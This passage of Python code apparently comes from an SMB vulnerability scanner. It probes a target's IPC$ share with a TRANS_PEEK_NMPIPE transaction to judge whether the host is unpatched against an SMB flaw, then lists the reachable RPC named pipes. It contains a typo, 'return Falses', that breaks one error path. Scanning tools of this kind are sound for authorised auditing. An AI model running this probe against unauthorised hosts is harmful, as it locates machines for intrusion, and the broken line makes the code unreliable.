            logger.red('Failed to obtain operating system')

        try:
            tree_connect_andx = '\\\\' + target + '\\' + 'IPC$'
            logger.verbose('Attempting to connect to %s' %
                           logger.BLUE(tree_connect_andx))
            tid = conn.tree_connect_andx(tree_connect_andx)
            conn.set_default_tid(tid)
            logger.verbose('Successfully connected to %s' %
                           logger.BLUE(tree_connect_andx))

        except Exception as e:
            logger.verbose('Got error whilst connecting to %s: %s' %
                           (tree_connect_andx, logger.BLUE(str(e))))
            return False

        # test if target is vulnerable
        logger.verbose('Testing if %s is vulnerable...' % logger.BLUE(target))
        try:
            TRANS_PEEK_NMPIPE = 0x23
            recvPkt = conn.send_trans(pack('<H', TRANS_PEEK_NMPIPE),
                                      maxParameterCount=0xffff,
                                      maxDataCount=0x800)
            status = recvPkt.getNTStatus()
            if status == 0xC0000205:  # STATUS_INSUFF_SERVER_RESOURCES
                logger.green('[%s] VULNERABLE' % logger.GREEN(target))
                vulnerable[target] = []
            else:
                logger.red('[%s] PATCHED' % logger.RED(target))
        except Exception as e:
            logger.verbose(
                'Got error whilst checking vulnerability status %s' %
                logger.BLUE(str(e)))
            return Falses

        pipes_found = []

        if target in vulnerable:
            logger.verbose('Checking pipes on %s' % logger.BLUE(target))
            for pipe_name, pipe_uuid in pipes.items():
                try:
                    dce = conn.get_dce_rpc(pipe_name)
                    dce.connect()
                    try:
                        dce.bind(pipe_uuid, transfer_syntax=NDR64Syntax)
                        try:
                            pipes_found.append(pipe_name)
                        except Exception as e:
                            logger.verbose(
                                'Got error whilst appending pipe to list %s' %
                                logger.BLUE(str(e)))
                            pass
                    except DCERPCException as e:
                        logger.verbose('Got error whilst binding to rpc: %s' %
                                       logger.BLUE(str(e)))
                        if 'transfer_syntaxes_not_supported' in str(e):
                            try:
                                pipes_found.append(pipe_name)
                            except Exception as e:
                                logger.verbose(
                                    'Got error whilst appending pipe to list %s (transfer_syntaxes_not_supported)'
                                    % logger.BLUE(str(e)))
                                pass
                        else:
                            try:
                                pipes_found.append(pipe_name)
                            except Exception as e:
                                logger.verbose(
                                    'Got error whilst appending pipe to list %s !(transfer_syntaxes_not_supported)'
                                    % logger.BLUE(str(e)))
                                pass
                    except Exception as e:
                        logger.verbose('Got error whilst binding to rpc: %s' %
                                       logger.BLUE(str(e)))
                        pass
                    finally:
                        dce.disconnect()
                    vulnerable[target] = pipes_found
                except smb.SessionError as e:
                    logger.verbose(
                        'Got SMB Session error whilst connecting %s' %
                        logger.BLUE(str(e)))
                    continue
                except smbconnection.SessionError as e:
                    logger.verbose(
                        'Got SMB Session error whilst connecting %s' %
                        logger.BLUE(str(e)))
                    continue
                except Exception as e:
                    logger.verbose(
                        'Got SMB Session error whilst connecting %s' %
                        logger.BLUE(str(e)))
                    continue
        try:
            conn.disconnect_tree(tid)
            conn.logoff()
            conn.get_socket().close()
        except Exception as e:
            logger.verbose('Got error whilst disconnecting from rpc %s' %
                           logger.BLUE(str(e)))
            pass
    except KeyboardInterrupt:
        logger.red('Keyboard interrupt received..')
        quit()